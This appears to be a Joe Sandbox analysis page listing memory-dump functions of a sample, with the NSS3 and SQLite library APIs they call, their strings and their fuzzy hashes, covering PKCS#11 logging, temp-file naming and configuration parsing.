Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: 913d1af4a1138f93ba7ead722c580bc895c935b8a0001172f4193bfe356ce9d6
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: 8271D631431B02DFD7627B31ED15A5BF6A2FF24300F104A1C93D62173C9A226B699752

Function 6C5828A0 Relevance: 50.9, APIs: 12, Strings: 17, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6C5828BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C5828EF

Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(?), ref: 6C660B88
Part of subcall function 6C6609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C660C5D
Part of subcall function 6C6609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C660C8D
Part of subcall function 6C6609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660C9C
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(?), ref: 6C660CD1
Part of subcall function 6C6609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C660CEC
Part of subcall function 6C6609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660CFB
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C660D16
Part of subcall function 6C6609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C660D26
Part of subcall function 6C6609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C660D35
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C660D65
Part of subcall function 6C6609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C660D70
Part of subcall function 6C6609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C660D90
Part of subcall function 6C6609D0: free.MOZGLUE(00000000), ref: 6C660D99

Part of subcall function 6C540F00: PR_GetPageSize.NSS3(6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F1B
Part of subcall function 6C540F00: PR_NewLogModule.NSS3(clock,6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C5828D6

Part of subcall function 6C6609D0: PR_Now.NSS3 ref: 6C660A22
Part of subcall function 6C6609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C660A35
Part of subcall function 6C6609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C660A66
Part of subcall function 6C6609D0: PR_GetCurrentThread.NSS3 ref: 6C660A70
Part of subcall function 6C6609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C660A9D
Part of subcall function 6C6609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C660AC8
Part of subcall function 6C6609D0: PR_vsmprintf.NSS3(?,?), ref: 6C660AE8
Part of subcall function 6C6609D0: EnterCriticalSection.KERNEL32(?), ref: 6C660B19
Part of subcall function 6C6609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C660B48
Part of subcall function 6C6609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C660C76
Part of subcall function 6C6609D0: PR_LogFlush.NSS3 ref: 6C660C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6C582963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C582983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6C5829A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6C5829C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6C582A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6C582A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6C582A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C582A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C582AB6

Strings

label = "%.32s", xrefs: 6C58295E
maxSessions = %u, Sessions = %u, xrefs: 6C582A43
CKF_LOGIN_REQUIRED, xrefs: 6C5829F3, 6C582A1E
firmware version: %d.%d, xrefs: 6C582AB1
hardware version: %d.%d, xrefs: 6C582A89
nfl, xrefs: 6C58290B, 6C582937
model = "%.16s", xrefs: 6C58299E
maxRwSessions = %u, RwSessions = %u, xrefs: 6C582A61
CKF_WRITE_PROTECTED, xrefs: 6C5829FE, 6C582A1F
serial = "%.16s", xrefs: 6C5829BE
slotID = 0x%x, xrefs: 6C5828D1
manufacturerID = "%.32s", xrefs: 6C58297E
pInfo = 0x%p, xrefs: 6C5828EA
C_GetTokenInfo, xrefs: 6C5828B8
CKF_RNG, xrefs: 6C582A13, 6C582A20
CKF_USER_PIN_INIT, xrefs: 6C5829E5
flags = %s %s %s %s, xrefs: 6C582A21

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo$nfl
API String ID: 2460313690-3556624159
Opcode ID: 2e83e2f793bf2aef732c2432aa7d75f784e0a9540e68f6e79722dae4a8dd6f99
Instruction ID: d62de5c8e1c2c92e46649c7787de99e41b29995772beca3022d15a3733c0acef
Opcode Fuzzy Hash: 2e83e2f793bf2aef732c2432aa7d75f784e0a9540e68f6e79722dae4a8dd6f99
Instruction Fuzzy Hash: B551D8B1602151EFFB108F51CDC9A653BE6EB8220DF498075E909ABA52DB31DC14CB6E

Function 6C626E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C53F9C9,?,6C53F4DA,6C53F9C9,?,?,6C50369A), ref: 6C4DCA7A
Part of subcall function 6C4DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4DCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C4EBE66), ref: 6C626E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C4EBE66), ref: 6C626E98
sqlite3_snprintf.NSS3(?,00000000,6C68AAF9,?,?,?,?,?,?,6C4EBE66), ref: 6C626EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C4EBE66), ref: 6C626ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C4EBE66), ref: 6C626EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C4EBE66), ref: 6C626F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C4EBE66), ref: 6C626F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C4EBE66), ref: 6C626F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C4EBE66), ref: 6C626FA6
sqlite3_snprintf.NSS3(?,00000000,6C68AAF9,00000000,?,?,?,?,?,?,?,6C4EBE66), ref: 6C626FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C4EBE66), ref: 6C626FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4EBE66), ref: 6C626FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C4EBE66), ref: 6C627014
sqlite3_free.NSS3(00000000,?,?,?,?,6C4EBE66), ref: 6C62701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C4EBE66), ref: 6C627030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C4EBE66), ref: 6C62705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C4EBE66), ref: 6C627079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C4EBE66), ref: 6C627097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C4EBE66), ref: 6C6270A0

Strings

Pfl, xrefs: 6C6270A8
winGetTempname2, xrefs: 6C6270C4
winGetTempname4, xrefs: 6C627046
winGetTempname5, xrefs: 6C627071
mz_etilqs_, xrefs: 6C626F18
winGetTempname1, xrefs: 6C62708F

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: Pfl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-534150992
Opcode ID: bbcfabc81d21c62e674e4d02c0a7f5924100f557382f3c720596a200202ded58
Instruction ID: 928aa9486a5a0ca5b773ec169b302baa7699f7d3b71aaff26cd1ae92ae1de5b3
Opcode Fuzzy Hash: bbcfabc81d21c62e674e4d02c0a7f5924100f557382f3c720596a200202ded58
Instruction Fuzzy Hash: 84517BB1A041126BE7109631AC65FBB36269F92318F144538E801DAFC1FF2AE51E86DF

Function 6C588E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C588E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C588EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C588EB3

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C588EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C588EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C588F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C588F29
PR_LogPrint.NSS3(?,00000000), ref: 6C588F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C588F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C588F80
PR_LogPrint.NSS3(?,00000000), ref: 6C588F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C588FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C588FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C589047

Strings

C_WrapKey, xrefs: 6C588E71
pMechanism = 0x%p, xrefs: 6C588EE0
pWrappedKey = 0x%p, xrefs: 6C588FAD
pulWrappedKeyLen = 0x%p, xrefs: 6C588FC8
*pulWrappedKeyLen = 0x%x, xrefs: 6C589042
hKey = 0x%x, xrefs: 6C588F5B, 6C588F6B
(CK_INVALID_HANDLE), xrefs: 6C588EAC, 6C588F1F, 6C588F79
hWrappingKey = 0x%x, xrefs: 6C588F01, 6C588F11
hSession = 0x%x, xrefs: 6C588E8E, 6C588E9E
nfl, xrefs: 6C588FEC, 6C589023

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$nfl
API String ID: 1003633598-3785698312
Opcode ID: 2fc4983146beb5bc84060dab4a61214ca882bce801159a450bf74d0de5d4339f
Instruction ID: 569522db32654dd5c79685bf804bf55066a9ec221cb18367d288788aafb45057
Opcode Fuzzy Hash: 2fc4983146beb5bc84060dab4a61214ca882bce801159a450bf74d0de5d4339f
Instruction Fuzzy Hash: 86519531602114EBDB00DF56DD88F9B7BB6EB8231CF044425F6096BA52D7319928CBAF

Function 6C5B4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5675C2,00000000,00000000,00000001), ref: 6C5B5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5675C2,00000000), ref: 6C5B5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C5B5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C5B50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5675C2), ref: 6C5B50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5B50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B5153
free.MOZGLUE(?), ref: 6C5B516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C5B517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B5195

Strings

nss=, xrefs: 6C5B5083
name=, xrefs: 6C5B5057
library=, xrefs: 6C5B5043
parameters=, xrefs: 6C5B506B
config=, xrefs: 6C5B509B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 0459a7e43b7a2a278e7771dd5c636ffd2e3cb7612e8ca932ee6399d0697d083d
Instruction ID: e52479cb20ada5903ba3f25c882ec83e5448de0abfa4470eb8b5a32922c21edb
Opcode Fuzzy Hash: 0459a7e43b7a2a278e7771dd5c636ffd2e3cb7612e8ca932ee6399d0697d083d
Instruction Fuzzy Hash: 3451D8B1A012066FEB05DF64DC51AAF3BA8AF06248F540420FC59F7741EB36E915CBB6

Function 6C5B4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C5A4F51,00000000), ref: 6C5B4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5A4F51,00000000), ref: 6C5B4C5B
PR_smprintf.NSS3(6C68AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C5A4F51,00000000), ref: 6C5B4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C5A4F51,00000000), ref: 6C5B4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5A4F51,00000000), ref: 6C5B4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5A4F51,00000000), ref: 6C5B4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C5B4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C5B4DA2
free.MOZGLUE(?), ref: 6C5B4DB9
free.MOZGLUE(00000000), ref: 6C5B4DCF

Strings

timeout, xrefs: 6C5B4C91
ootT, xrefs: 6C5B4D1A
any, xrefs: 6C5B4C96
rootFlags, xrefs: 6C5B4D47
0x%08lx=[%s %s], xrefs: 6C5B4D80
rust, xrefs: 6C5B4D22
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C5B4D9D
%s,%s, xrefs: 6C5B4C4B
every, xrefs: 6C5B4CA1
slotFlags, xrefs: 6C5B4D34

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 184f45e985922ee4cfb508d4cbe34139d0487cc36bb3d5a68b33d955d6201f5f
Instruction ID: f2c111aa55195c211081ac848f083d304a977976e66d06761725270055328686
Opcode Fuzzy Hash: 184f45e985922ee4cfb508d4cbe34139d0487cc36bb3d5a68b33d955d6201f5f
Instruction Fuzzy Hash: 7F416CB2900141AFDB219F699C906BF3F65AF92708F084124EC1A6BB01E731ED14C7E7

Function 6C584950 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 170COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CopyObject), ref: 6C584976
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5849A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5849B6

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5849CC
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C5849FA
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C584A09
PR_LogPrint.NSS3(?,00000000), ref: 6C584A1F
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C584A40
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C584A5C
PR_LogPrint.NSS3( phNewObject = 0x%p,?), ref: 6C584A7C
PL_strncpyz.NSS3(?, *phNewObject = 0x%x,00000050), ref: 6C584B17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C584B26
PR_LogPrint.NSS3(?,00000000), ref: 6C584B3C

Strings

pTemplate = 0x%p, xrefs: 6C584A39
*phNewObject = 0x%x, xrefs: 6C584B01, 6C584B11
(CK_INVALID_HANDLE), xrefs: 6C5849AF, 6C584A02, 6C584B1F
hObject = 0x%x, xrefs: 6C5849E4, 6C5849F4
phNewObject = 0x%p, xrefs: 6C584A77
C_CopyObject, xrefs: 6C584971
ulCount = %d, xrefs: 6C584A57
hSession = 0x%x, xrefs: 6C584991, 6C5849A1
nfl, xrefs: 6C584AA6, 6C584ADC

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phNewObject = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phNewObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_CopyObject$nfl
API String ID: 1003633598-1853252956
Opcode ID: fb4e641636d476754d2441bd1d4fa8b894ea9a5cc99c6a151c0ac79012965268
Instruction ID: 78f7bd7ae1ff269bc89da91f2d1e536e7b4acb520f41e3f8c7de33bf43b9605c
Opcode Fuzzy Hash: fb4e641636d476754d2441bd1d4fa8b894ea9a5cc99c6a151c0ac79012965268
Instruction Fuzzy Hash: 4551A371602114ABDB00DF56DD84F9A77BAEB8230DF054424F9097BB11D7209D28CBAE

Function 6C596910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C596943

Part of subcall function 6C5B4210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,5C13B8AF,flags,?,00000000,?,6C595947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C5B4220
Part of subcall function 6C5B4210: NSSUTIL_ArgGetParamValue.NSS3(?,GYYl,?,?,?,?,?,?,00000000,?,00000000,?,6C597703,?,00000000,00000000), ref: 6C5B422D
Part of subcall function 6C5B4210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C597703), ref: 6C5B424B
Part of subcall function 6C5B4210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C597703,?,00000000), ref: 6C5B4272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C596957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C596972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C596983

Part of subcall function 6C5B3EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C58C79F,?,6C596247,70E85609,?,?,6C58C79F,6C59781D,?,6C58BD52,00000001,70E85609,D85D8B04,?), ref: 6C5B3EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C5969AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C5969BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C5969D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C5969DF

Part of subcall function 6C5B4020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,74F84C80,?,6C5B50B7,?), ref: 6C5B4041

free.MOZGLUE(00000000), ref: 6C5969F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C596A04
free.MOZGLUE(00000000), ref: 6C596A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C596A29
free.MOZGLUE(00000000), ref: 6C596A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C596A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6C596A5B

Strings

keyPrefix=, xrefs: 6C5969CC
configdir=, xrefs: 6C5969A4
readOnly, xrefs: 6C59693D
nocertdb, xrefs: 6C596951
flags, xrefs: 6C596937, 6C596942, 6C596956, 6C59696D
certPrefix=, xrefs: 6C5969B8
nokeydb, xrefs: 6C596968

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
